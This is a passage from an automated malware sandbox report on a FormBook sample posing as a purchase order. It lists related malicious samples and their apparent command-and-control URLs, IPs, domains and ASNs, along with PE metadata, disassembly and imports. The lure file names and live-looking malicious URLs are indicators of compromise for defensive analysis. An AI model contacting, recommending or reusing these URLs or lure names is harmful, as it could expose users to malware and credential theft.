                                162.0.238.246RECIEPT.PDF.exeGet hashmaliciousFormBookBrowse
                                • www.quantis.life/hczh/
                                LgzpILNkS2.exeGet hashmaliciousFormBookBrowse
                                • www.inchey.online/ercr/
                                198.50.252.64iuwxw7l3B8.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                • www.verenasbooks.store/hjdr/?aytH=7m7AmZ9BBJEagLLeZgr2XL6fJR0y+AEH3ntgHoqZ8GszJNEXChLSj6Lc9CsP8jGA+phvNyfEJtPzAws3azF8kZW9pKZWzmns8g==&dF=zeCQgMQZOsoc6
                                JXKpeA9gSm.exeGet hashmaliciousFormBookBrowse
                                • www.carrconsulting.xyz/ippd/?JEqt=9n5vjw5BL&fIZhqNlL=OyXFxvvgpcLcRqR+QVgY8OZ5s1CF8ip7ZgF4/hB4mo4TVQOl2nAT57D2kXHzhRsnyQCaeCXL3uGHhLOpIDo91srV9JQCufFuNg==
                                vbc.exeGet hashmaliciousFormBookBrowse
                                • www.manessi.xyz/tic4/?nT2D4O=wmM+JQLX/LTjIkhLav/7pifcu4/qS9Lf16ILZkXVwVQxvUCe6R/jkMB9z+OmOvy7WtV1AtFnTgBDorlVThTsxCjUbfcAlbJTSw==&3zz7d=KBnjbttNLxpc
                                Order specification.exeGet hashmaliciousFormBookBrowse
                                • www.carrconsulting.xyz/ippd/?P3P2FX=dsNnsySir6HfQ56p&4oY8PKi=OyXFxvvgpcLcRqR+QVgY8OZ5s1CF8ip7ZgF4/hB4mo4TVQOl2nAT57D2kXHzhRsnyQCaeCXL3uGHhLOpIDo91pvEga4CvfN2Ng==
                                SecuriteInfo.com.Win32.PWSX-gen.93.10409.exeGet hashmaliciousFormBookBrowse
                                • www.carrconsulting.xyz/ippd/?Rp6W=x4IN&dpa=OyXFxvvgpcLcRqR+QVgY8OZ5s1CF8ip7ZgF4/hB4mo4TVQOl2nAT57D2kXHzhRsnyQCaeCXL3uGHhLOpIDo91pvEga4CvfN2Ng==
                                new_order_quotation_030022023000000000000000_PDF.exeGet hashmaliciousFormBookBrowse
                                • www.carrconsulting.xyz/h68b/?61=C8_gzqz&KLfb=mpCHzHLyAvu5qhW/nYzCL2lBNLEE+CMBrQrhb716kuEaaBIYUPWJ/npU0F7qJ9VEN3zOet630ULeAunXG2JUp/WcIwhRRlWzbQ==
                                Order specification.exeGet hashmaliciousFormBookBrowse
                                • www.carrconsulting.xyz/ippd/?qkmio=TvFaelEDVSuf1D8o&S9=OyXFxvvgpcLcRqR+QVgY8OZ5s1CF8ip7ZgF4/hB4mo4TVQOl2nAT57D2kXHzhRsnyQCaeCXL3uGHhLOpIDo4n5XU3YQKo5NfOQ==
                                Order specification.exeGet hashmaliciousFormBookBrowse
                                • www.carrconsulting.xyz/ippd/
                                rfq_items_order_purchase_quotation_27012023000000000000_PDF.exeGet hashmaliciousFormBookBrowse
                                • www.carrconsulting.xyz/h68b/?f-pX=mpCHzHLyAvu5qhW/nYzCL2lBNLEE+CMBrQrhb716kuEaaBIYUPWJ/npU0F7qJ9VEN3zOet630ULeAunXG2JVmdHXaW9vQA/fZA==&RNxq=9ncpHuCJAEbu9IR
                                Order specification.exeGet hashmaliciousFormBookBrowse
                                • www.carrconsulting.xyz/ippd/?SBo=zNT0B&fwZG=OyXFxvvgpcLcRqR+QVgY8OZ5s1CF8ip7ZgF4/hB4mo4TVQOl2nAT57D2kXHzhRsnyQCaeCXL3uGHhLOpIDo91pvEga4CvfN2Ng==
                                62.149.128.40PO76389.exeGet hashmaliciousFormBookBrowse
                                • www.fimgroup.net/f3w9/
                                bintoday1.exeGet hashmaliciousFormBookBrowse
                                • www.fimgroup.net/m3ft/
                                Atlas Copco- WEPCO.exeGet hashmaliciousFormBookBrowse
                                • www.fimgroup.net/fqzh/
                                file No83293 PO & Specification.gz.exeGet hashmaliciousFormBookBrowse
                                • www.pyrlist-test.cloud/apau/?32gdi4=omLpuGVmsyOHdGpRdjgRwIdS8onMLPtYZwnQxrZ2pdkklfz3vB2UBDvQaSU1YR7Xr6uYdwMb/adcCe42hD+vmDiudnADMik3xc+FpjXk83bBo7qDRClwT378wlWS9dAj4UFWXQx8lPSh&wLAt=m8MLyLih-H4lf
                                64MXEd79F1.exeGet hashmaliciousFormBookBrowse
                                • www.autoreediritto.com/aucq/?pZXDmpb8=KoQMLvtx3M4SfAq6wckzW9CSarLFnHHB0euSLOV9eLfxROMJcI8ufZi+pNPsARzNL1LmWOMQM+kJCjoighlqXenXGQFHAUL+cMNE98AcgW9WHO0Ixf81xDLisHhibZAVvCGoKVw=&fv=tdYXXJI8Drl4
                                09090.exeGet hashmaliciousFormBookBrowse
                                • www.autoreediritto.com/aucq/?zFQHE=KoQMLvtx3M4SfAq6wckzW9CSarLFnHHB0euSLOV9eLfxROMJcI8ufZi+pNPsARzNL1LmWOMQM+kJCjoighlqXenXGQFHAUL+cMNE98AcgW9WHO0Ixf81xDLisHhibZAVvCGoKVw=&yF3=b0i4Y00xHtf
                                8bwKawHg0Z.exeGet hashmaliciousFormBookBrowse
                                • www.autoreediritto.com/aucq/?m4kp=Q04lO4tHCdMhGRPp&Z2n4kTEh=KoQMLvtx3M4SfAq6wckzW9CSarLFnHHB0euSLOV9eLfxROMJcI8ufZi+pNPsARzNL1LmWOMQM+kJCjoighlqUenkRjtIRRn+PcJ+980YglFIHv1RxaMTu2bilHhQR8NY0g==
                                98790ytt.exeGet hashmaliciousFormBookBrowse
                                • www.autoreediritto.com/aucq/?GHo=KoQMLvtx3M4SfAq6wckzW9CSarLFnHHB0euSLOV9eLfxROMJcI8ufZi+pNPsARzNL1LmWOMQM+kJCjoighlqXenXGQFHAUL+cMNE98AcgW9WHO0Ixf81xDLisHhibZAVvCGoKVw=&i2=tZJdhrYHabWX4H
                                aertrh.exeGet hashmaliciousFormBookBrowse
                                • www.autoreediritto.com/aucq/?bbtD=v8Pp0x&mXnt=KoQMLvtx3M4SfAq91ckdEaeNevOygAbB0euSLOV9eLfxROMJcI8ufZi+pNPsARzNL1LmWOMQM+kJCjoighlqWc3KGV5GAX2rZsRT+8QcgDF4B+0ExfJRqG4=
                                RB_VAC_1.EXE.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                • www.stnlab.net/twn7/

                                Domains

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                natroredirect.natrocdn.comAWB_5771388044 Documenti di spedizione.exeGet hashmaliciousFormBookBrowse
                                • 85.159.66.93
                                Cotizaci#U00f3n.exeGet hashmaliciousFormBookBrowse
                                • 85.159.66.93
                                PO2024033194.exeGet hashmaliciousFormBookBrowse
                                • 85.159.66.93
                                FvYlbhvZrZ.rtfGet hashmaliciousFormBookBrowse
                                • 85.159.66.93
                                SecuriteInfo.com.Win32.SuspectCrc.23106.21095.xlsxGet hashmaliciousFormBookBrowse
                                • 85.159.66.93
                                file.exeGet hashmaliciousFormBookBrowse
                                • 85.159.66.93
                                file.exeGet hashmaliciousFormBookBrowse
                                • 85.159.66.93
                                Quote 05-302.lnkGet hashmaliciousFormBookBrowse
                                • 85.159.66.93
                                LgzpILNkS2.exeGet hashmaliciousFormBookBrowse
                                • 85.159.66.93
                                ncOLm62YLB.exeGet hashmaliciousFormBookBrowse
                                • 85.159.66.93
                                www.rtpngk.xyzPO2024033194.exeGet hashmaliciousFormBookBrowse
                                • 188.114.96.3
                                DOC092024-0431202229487.exeGet hashmaliciousFormBookBrowse
                                • 188.114.97.3
                                cluster580fc23f.abcty2.comDCP11-83642024..exeGet hashmaliciousFormBookBrowse
                                • 154.198.53.36
                                file.exeGet hashmaliciousFormBookBrowse
                                • 185.121.169.26
                                https://9bet999.com/Get hashmaliciousUnknownBrowse
                                • 154.198.53.36
                                http://9bet938.com/Get hashmaliciousUnknownBrowse
                                • 154.198.53.36
                                https://1b375bcda594bd6f.bet898.vip/Get hashmaliciousUnknownBrowse
                                • 154.198.53.47
                                http://58365888.cc/Get hashmaliciousUnknownBrowse
                                • 45.194.36.61
                                https://bet958v.com/Get hashmaliciousUnknownBrowse
                                • 27.0.235.55
                                https://bet958z.com/Get hashmaliciousUnknownBrowse
                                • 154.198.53.36
                                https://bet958d.com/Get hashmaliciousUnknownBrowse
                                • 81.31.208.67
                                https://7365bb.vip/Get hashmaliciousUnknownBrowse
                                • 185.121.169.26

                                ASNs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                COGENT-174UShttp://xb2.aggressiveq9.com/21u/Get hashmaliciousHTMLPhisherBrowse
                                • 143.244.208.184
                                q8HkBndUpP.exeGet hashmaliciousUnknownBrowse
                                • 38.175.45.11
                                yoYRK88Xg2.exeGet hashmaliciousUnknownBrowse
                                • 38.175.45.20
                                jade.arm.elfGet hashmaliciousMiraiBrowse
                                • 206.0.212.64
                                jade.ppc.elfGet hashmaliciousMiraiBrowse
                                • 149.40.99.56
                                AWB_5771388044 Documenti di spedizione.exeGet hashmaliciousFormBookBrowse
                                • 206.119.82.147
                                ES-241-29335_pdf.exeGet hashmaliciousFormBookBrowse
                                • 38.181.21.65
                                PO2024033194.exeGet hashmaliciousFormBookBrowse
                                • 154.23.184.240
                                PO #86637.exeGet hashmaliciousFormBookBrowse
                                • 154.23.184.240
                                RECIEPT.PDF.exeGet hashmaliciousFormBookBrowse
                                • 206.119.82.172
                                NAMECHEAP-NETUSPO-001.exeGet hashmaliciousFormBookBrowse
                                • 162.0.239.141
                                Cotizaci#U00f3n.exeGet hashmaliciousFormBookBrowse
                                • 63.250.47.40
                                ES-241-29335_pdf.exeGet hashmaliciousFormBookBrowse
                                • 63.250.47.40
                                Request for Quotation Hi-Tech Park Project 193200.exeGet hashmaliciousFormBookBrowse
                                • 199.192.21.169
                                LOL and profile.exeGet hashmaliciousFormBookBrowse
                                • 162.0.236.169
                                RECIEPT.PDF.exeGet hashmaliciousFormBookBrowse
                                • 162.0.238.246
                                PO# Q919240.exeGet hashmaliciousFormBookBrowse
                                • 63.250.47.40
                                ADNOC REQUESTS & reviews.exeGet hashmaliciousFormBookBrowse
                                • 162.0.236.169
                                https://suspokertellscractor-f7a93a.ingress-florina.ewp.live/wp-content/plugins/unsemitions/infospage.phpGet hashmaliciousUnknownBrowse
                                • 63.250.43.136
                                http://siddiquimehvish07.github.io/neflixclone.github.ioGet hashmaliciousHTMLPhisherBrowse
                                • 162.0.235.241
                                OVHFRhttp://xb2.aggressiveq9.com/21u/Get hashmaliciousHTMLPhisherBrowse
                                • 54.38.113.2
                                https://secure.rpcthai.com/Get hashmaliciousUnknownBrowse
                                • 5.196.111.73
                                ounU0OuZvF.rtfGet hashmaliciousUnknownBrowse
                                • 91.134.98.142
                                http://scandalous-big-open.glitch.me/auto.htmlGet hashmaliciousUnknownBrowse
                                • 46.105.222.82
                                8zzBr1gT31.elfGet hashmaliciousMiraiBrowse
                                • 5.196.148.136
                                iZP1hJhnmz.elfGet hashmaliciousMiraiBrowse
                                • 5.196.148.130
                                RFQ_PO_KMM7983972_ORDER_DETAILS.jsGet hashmaliciousAgentTesla, RedLineBrowse
                                • 51.195.88.199
                                https://onlyclips.site/?title=quinnfinite&ref=gitGet hashmaliciousUnknownBrowse
                                • 149.56.240.27
                                ORDER_DOCUMENT_PO_GQB793987646902.TXT.MPEG.PNG.CMD.cmdGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                • 51.195.88.199
                                https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp/s%2Ffactorhumano.eu/.dev/75603jiAG/UkZyZWVzbGFuZEBidXJiYW5rY2EuZ292Get hashmaliciousUnknownBrowse
                                • 178.33.162.219

                                JA3 Fingerprints

                                No context

                                Dropped Files

                                No context

                                Created / dropped Files

                                C:\Users\user\AppData\Local\Temp\1ySo2KZ76

                                Download File
                                Process:C:\Windows\SysWOW64\grpconv.exe
                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                Category:modified
                                Size (bytes):196608
                                Entropy (8bit):1.1215420383712111
                                Encrypted:false
                                SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                Malicious:false
                                Reputation:moderate, very likely benign file
                                Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\Users\user\AppData\Local\Temp\cunili

                                Download File
                                Process:C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe
                                File Type:data
                                Category:modified
                                Size (bytes):287232
                                Entropy (8bit):7.994664134270278
                                Encrypted:true
                                SSDEEP:6144:v1ORRLrFIIoyyYdykYbkrtuJsYIS0JYFOmiDHFmNf2EqkAR63YnaZz:vwRL+I4AykkJsYISF9iDHoV2Eqk86YnQ
                                MD5:F247A71D68BD8493200D7D622C78C60D
                                SHA1:188F6994B782EB8D5C65F54C18EF78EDF8107AF0
                                SHA-256:FF8DF61B2AC0DF2BE827A48AEC171E150F68727B0301C5EDF7557DF5E662B2CC
                                SHA-512:F0321A64B1770BFDE4D3528626EAB6BF62A2F197BD3DB8FFBC74DD6D8EC34E421BF6F55C373AE7B65278A0AA44EEC38A0CD2A755C47AFD9D4FBFCAD427AE0AD1
                                Malicious:false
                                Reputation:low
                                Preview:...b.XXHSm.[....o.7[..l7Z...TTA0CXXHS5PXR6SG4S37XYASD4RUXY.TA0MG.FS.Y.s.R..rg_1*a#6[5'94t7 ^-7,h1Pp*'Xs.Zswx.y,< Q|XUSpTA0CXXH*4Y.oV4..3T.e9&.^...b93.[..d(4.J...o'S.a^;1|3#.RUXYTTA0..XH.4QX.5X.4S37XYAS.4PTSX_TA`GXXHS5PXR6cR4S3'XYA3@4RU.YTDA0CZXHU5PXR6SG2S37XYASDTVUX[TTA0CXZH..PXB6SW4S37HYACD4RUXYDTA0CXXHS5PXR6SG4S37XYASD4RUXYTTA0CXXHS5PXR6SG4S37XYASD4RUXYTTA0CXXHS5PXR6SG4S37XYASD4RUXYTTA0CXXHS5PXR6SG4S37XYASD4RUXYTTA0CXXHS5PX|B6?@S37..ESD$RUX.PTA CXXHS5PXR6SG4S.7X9ASD4RUXYTTA0CXXHS5PXR6SG4S37XYASD4RUXYTTA0CXXHS5PXR6SG4S37XYASD4RUXYTTA0CXXHS5PXR6SG4S37XYASD4RUXYTTA0CXXHS5PXR6SG4S37XYASD4RUXYTTA0CXXHS5PXR6SG4S37XYASD4RUXYTTA0CXXHS5PXR6SG4S37XYASD4RUXYTTA0CXXHS5PXR6SG4S37XYASD4RUXYTTA0CXXHS5PXR6SG4S37XYASD4RUXYTTA0CXXHS5PXR6SG4S37XYASD4RUXYTTA0CXXHS5PXR6SG4S37XYASD4RUXYTTA0CXXHS5PXR6SG4S37XYASD4RUXYTTA0CXXHS5PXR6SG4S37XYASD4RUXYTTA0CXXHS5PXR6SG4S37XYASD4RUXYTTA0CXXHS5PXR6SG4S37XYASD4RUXYTTA0CXXHS5PXR6SG4S37XYASD4RUXYTTA0CXXHS5PXR6SG4S37XYASD4RUXYTTA0CXXHS5PXR6SG4S37XYASD4RUXYTTA0CXXHS5

                                Static File Info

                                General

                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Entropy (8bit):7.360995698697927
                                TrID:
                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                • Generic Win/DOS Executable (2004/3) 0.02%
                                • DOS Executable Generic (2002/1) 0.02%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:Purchase Order_ AEPL-2324-1126.exe
                                File size:1'509'575 bytes
                                MD5:4d40b6f064db9c79d427ca2a2c9b87ae
                                SHA1:aeed2a31d23e0615c1f8ecc2f10c9ad285666b2d
                                SHA256:8b117326a85883033f16c21e24a6e07bcc1cb7cced62623a95c1649e7b727688
                                SHA512:39f15396eab2d4819a92af72c8a8cb1323a1b9418663b8a6f5a3bf0e6dc04ef213fb4c1eb5252df2b70bfa2c9710c43c669eaa0860c1af21b0b7c89f9473c150
                                SSDEEP:24576:vRmJkcoQricOIQxiZY1WNE8JLF0r7ICh7KHtYguK+wBWmzoYvt:kJZoQrbTFZY1WNEIpJmSYfK+w5zX
                                TLSH:A765F121B5D5906EC1B32FB08E7EF3659738793A0226D64B3FC9293D4DF11412A2E726
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................1b.......P.).....Q.......y.......i..........}....N.......d.......`.......m.......g.....Rich............PE..L..

                                File Icon

                                Icon Hash:7f4746c7c7730f06

                                Static PE Info

                                General

                                Entrypoint:0x4165c1
                                Entrypoint Section:.text
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                DLL Characteristics:TERMINAL_SERVER_AWARE
                                Time Stamp:0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:5
                                OS Version Minor:0
                                File Version Major:5
                                File Version Minor:0
                                Subsystem Version Major:5
                                Subsystem Version Minor:0
                                Import Hash:369fe35b86c83b3130c02698158a4d4d

                                Entrypoint Preview

                                Instruction
                                call 00007F3150CDBFDBh
                                jmp 00007F3150CD2E4Eh
                                int3
                                int3
                                int3
                                int3
                                int3
                                push ebp
                                mov ebp, esp
                                push edi
                                push esi
                                mov esi, dword ptr [ebp+0Ch]
                                mov ecx, dword ptr [ebp+10h]
                                mov edi, dword ptr [ebp+08h]
                                mov eax, ecx
                                mov edx, ecx
                                add eax, esi
                                cmp edi, esi
                                jbe 00007F3150CD2FCAh
                                cmp edi, eax
                                jc 00007F3150CD3166h
                                cmp ecx, 00000080h
                                jc 00007F3150CD2FDEh
                                cmp dword ptr [004A9724h], 00000000h
                                je 00007F3150CD2FD5h
                                push edi
                                push esi
                                and edi, 0Fh
                                and esi, 0Fh
                                cmp edi, esi
                                pop esi
                                pop edi
                                jne 00007F3150CD2FC7h
                                jmp 00007F3150CD33A2h
                                test edi, 00000003h
                                jne 00007F3150CD2FD6h
                                shr ecx, 02h
                                and edx, 03h
                                cmp ecx, 08h
                                jc 00007F3150CD2FEBh
                                rep movsd
                                jmp dword ptr [00416740h+edx*4]
                                mov eax, edi
                                mov edx, 00000003h
                                sub ecx, 04h
                                jc 00007F3150CD2FCEh
                                and eax, 03h
                                add ecx, eax
                                jmp dword ptr [00416654h+eax*4]
                                jmp dword ptr [00416750h+ecx*4]
                                nop
                                jmp dword ptr [004166D4h+ecx*4]
                                nop
                                inc cx
                                add byte ptr [eax-4BFFBE9Ah], dl
                                inc cx
                                add byte ptr [ebx], ah
                                ror dword ptr [edx-75F877FAh], 1
                                inc esi
                                add dword ptr [eax+468A0147h], ecx
                                add al, cl
                                jmp 00007F315314B7C7h
                                add esi, 03h
                                add edi, 03h
                                cmp ecx, 08h
                                jc 00007F3150CD2F8Eh
                                rep movsd
                                jmp dword ptr [00000000h+edx*4]

                                Rich Headers

                                Programming Language:
                                • [ C ] VS2010 SP1 build 40219
                                • [C++] VS2010 SP1 build 40219
                                • [ C ] VS2008 SP1 build 30729
                                • [IMP] VS2008 SP1 build 30729
                                • [ASM] VS2010 SP1 build 40219
                                • [RES] VS2010 SP1 build 40219
                                • [LNK] VS2010 SP1 build 40219

                                Data Directories

                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT0x8d41c0x154.rdata
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xab0000x34430.rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                Sections

                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                .text0x10000x8061c0x8080061ffce4768976fa0dd2a8f6a97b1417aFalse0.5583182605787937data6.684690148171278IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                .rdata0x820000xdfc00xe000f0991b788ac34ea4b210673093655317False0.3256312779017857data4.484090180677536IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .data0x900000x1a7580x68008033f5a38941b4685bc2299e78f31221False0.15324519230769232data2.1500715391677487IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .rsrc0xab0000x344300x34600a82206669afc4deee240736fd6f51cdbFalse0.42391203013126494data5.503762238230974IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                Resources

                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                RT_ICON0xab5c80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                RT_ICON0xab6f00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                RT_ICON0xab8180x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                RT_ICON0xab9400x9b30PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9974828836085381
                                RT_ICON0xb54700x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishGreat Britain0.23448775582633385
                                RT_ICON0xc5c980x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishGreat Britain0.3154036157241959
                                RT_ICON0xcf1400x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishGreat Britain0.3422365988909427
                                RT_ICON0xd45c80x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishGreat Britain0.3288852149267832
                                RT_ICON0xd87f00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishGreat Britain0.4078838174273859
                                RT_ICON0xdad980x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishGreat Britain0.4545028142589118
                                RT_ICON0xdbe400x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishGreat Britain0.5471311475409836
                                RT_ICON0xdc7c80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishGreat Britain0.6542553191489362
                                RT_MENU0xdcc300x50dataEnglishGreat Britain0.9
                                RT_DIALOG0xdcc800xfcdataEnglishGreat Britain0.6507936507936508
                                RT_STRING0xdcd800x530dataEnglishGreat Britain0.33960843373493976
                                RT_STRING0xdd2b00x690dataEnglishGreat Britain0.26964285714285713
                                RT_STRING0xdd9400x4d0dataEnglishGreat Britain0.36363636363636365
                                RT_STRING0xdde100x5fcdataEnglishGreat Britain0.3087467362924282
                                RT_STRING0xde4100x65cdataEnglishGreat Britain0.34336609336609336
                                RT_STRING0xdea700x388dataEnglishGreat Britain0.377212389380531
                                RT_STRING0xdedf80x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishUnited States0.502906976744186
                                RT_GROUP_ICON0xdef500x84dataEnglishGreat Britain0.7348484848484849
                                RT_GROUP_ICON0xdefd80x14dataEnglishGreat Britain1.15
                                RT_GROUP_ICON0xdeff00x14dataEnglishGreat Britain1.25
                                RT_GROUP_ICON0xdf0080x14dataEnglishGreat Britain1.25
                                RT_VERSION0xdf0200x19cdataEnglishGreat Britain0.5339805825242718
                                RT_MANIFEST0xdf1c00x26cASCII text, with CRLF line terminatorsEnglishUnited States0.5145161290322581

                                Imports

                                DLLImport
                                KERNEL32.DLLHeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA
                                ADVAPI32.dllRegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey
                                COMCTL32.dllImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
                                COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                GDI32.dllDeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo
